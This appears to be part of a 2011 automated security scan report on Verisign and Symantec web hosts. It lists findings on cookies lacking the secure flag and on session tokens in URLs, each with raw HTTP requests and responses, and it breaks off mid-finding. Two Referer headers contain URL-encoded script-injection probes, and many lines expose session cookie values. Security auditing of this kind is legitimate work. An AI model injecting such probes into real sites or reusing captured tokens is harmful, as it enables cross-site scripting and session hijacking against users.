HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 19769 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro...[SNIP]...
6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/utility.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/utility.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 8013 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;} if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)...[SNIP]...
6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/brand.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/brand.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 7437 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css @import "vrsn.css"; #vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;} #vrsn_standard_bar_footer{border-top:1px solid #EDEDEE...[SNIP]...
6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/capture_payment.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/capture_payment.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2075 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /*import from capture_payment.css - Coakley 10_5_2010 */ .radio_button {width:180px;} .blurb {padding-left:5px;padding-bottom:10px;} #tax_exemption_section {margin-left:35px;} .content_line { position...[SNIP]...
6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/minimal_form.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/minimal_form.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 3324 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #quick_signin_box {position:relative;top:0px;margin:0px;} .minimal-form-gray, .minimal-form-gray * {background-color:gray;} .minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t...[SNIP]...
6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/module.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/module.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 698 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;} #ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po...[SNIP]...
6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/product_selector.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/product_selector.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 9496 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #comparison_chart_panel{position:absolute;right:20px;top:0;} #product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;...[SNIP]...
6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/vrsn.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/vrsn.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 30719 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0} a:link,a:visited{color:#1446A8;text-decoration:underline} h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}...[SNIP]...
6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/assets/visual-sciences/vip/zig.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/visual-sciences/vip/zig.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: https://idprotect.verisign.com/toolbar/activate.v Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.verisign.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:55 GMT Server: ApacheSet-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT Accept-Ranges: bytes Content-Length: 2602 Expires: Sun, 09 Oct 2011 21:47:55 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-javascript //REFERENCE PAGE TAG var ct = "<img src="; var cd = "//www.verisign.com"; //this should contain the domain of the web site var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai...[SNIP]...
6.67. https://www4.symantec.com/Vrt/wl
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www4.symantec.com
Path:
/Vrt/wl
Issue detail
The following cookie was issued by the application and does not have the secure flag set:SYMC_TRANS_ID=69836485@@1315604068690; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Vrt/wl?tu_id=akMg1303300545922330202 HTTP/1.1 Host: www4.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315621972496-New%7C1336357972496%3B%20event69%3Devent69%7C1336357972499%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:34:28 GMT Content-type: text/html X-atg-version: ATGPlatform/2006.3p3 [ DASLicense/0 DPSLicense/0 ]Set-cookie: SYMC_TRANS_ID=69836485@@1315604068690; path=/ Location: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 Content-Length: 97 <HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
7. Session token in URL
previous
next
There are 15 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
7.1. https://idprotect.verisign.com/images/favicon.ico
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/images/favicon.ico
Issue detail
The URL in the request appears to contain a session token within the query string:https://idprotect.verisign.com/images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Request
GET /images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:45:45 GMT Server: Apache Location: https://idprotect.verisign.com/images/favicon.ico Content-Length: 330 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://idprotect.veris...[SNIP]...
7.2. https://idprotect.verisign.com/kaptcha.jpg
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/kaptcha.jpg
Issue detail
The URL in the request appears to contain a session token within the query string:https://idprotect.verisign.com/kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc
Request
GET /kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://idprotect.verisign.com/toolbar/activate.v Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive Cookie: JSESSIONID=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc
Response
HTTP/1.0 301 Moved Permanently Date: Fri, 09 Sep 2011 21:49:00 GMT Server: Apache Location: https://idprotect.verisign.com/kaptcha.jpg Content-Length: 323 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://idprotect.veris...[SNIP]...
7.3. https://idprotect.verisign.com/scripts/global.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/scripts/global.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://idprotect.verisign.com/scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Request
GET /scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1 Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:47:12 GMT Server: Apache Location: https://idprotect.verisign.com/scripts/global.js Content-Length: 329 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://idprotect.veris...[SNIP]...
7.4. https://idprotect.verisign.com/toolbar/activate.v
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/toolbar/activate.v
Issue detail
The response contains the following links that appear to contain session tokens:https://idprotect.verisign.com/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc https://idprotect.verisign.com/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc https://idprotect.verisign.com/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc
Request
GET /toolbar/activate.v HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:48:59 GMT Set-Cookie: JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure Content-Type: text/html;charset=utf-8 Content-Length: 7564 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <meta http-equiv="Expires" content="0" /><link rel="icon" href="/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"/> <title>...[SNIP]... <link rel="stylesheet" type="text/css" media="print" href="/common/styles/print.css" /> <script type="text/javascript" src="/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"> </script>...[SNIP]... <br/><img id="kaptchaImage" src="/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc" alt="Click for a different one!" title="Click for a different one!" /> <img id="kaptchaRefresh" src="/brand-verisign/images/ico_refresh_captcha.gif" alt="Click for a different one!" title="Click for a different one!" />...[SNIP]...
7.5. http://m.verisign.com/home.v
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://m.verisign.com
Path:
/home.v
Issue detail
The URL in the request appears to contain a session token within the query string:http://m.verisign.com/home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2
Request
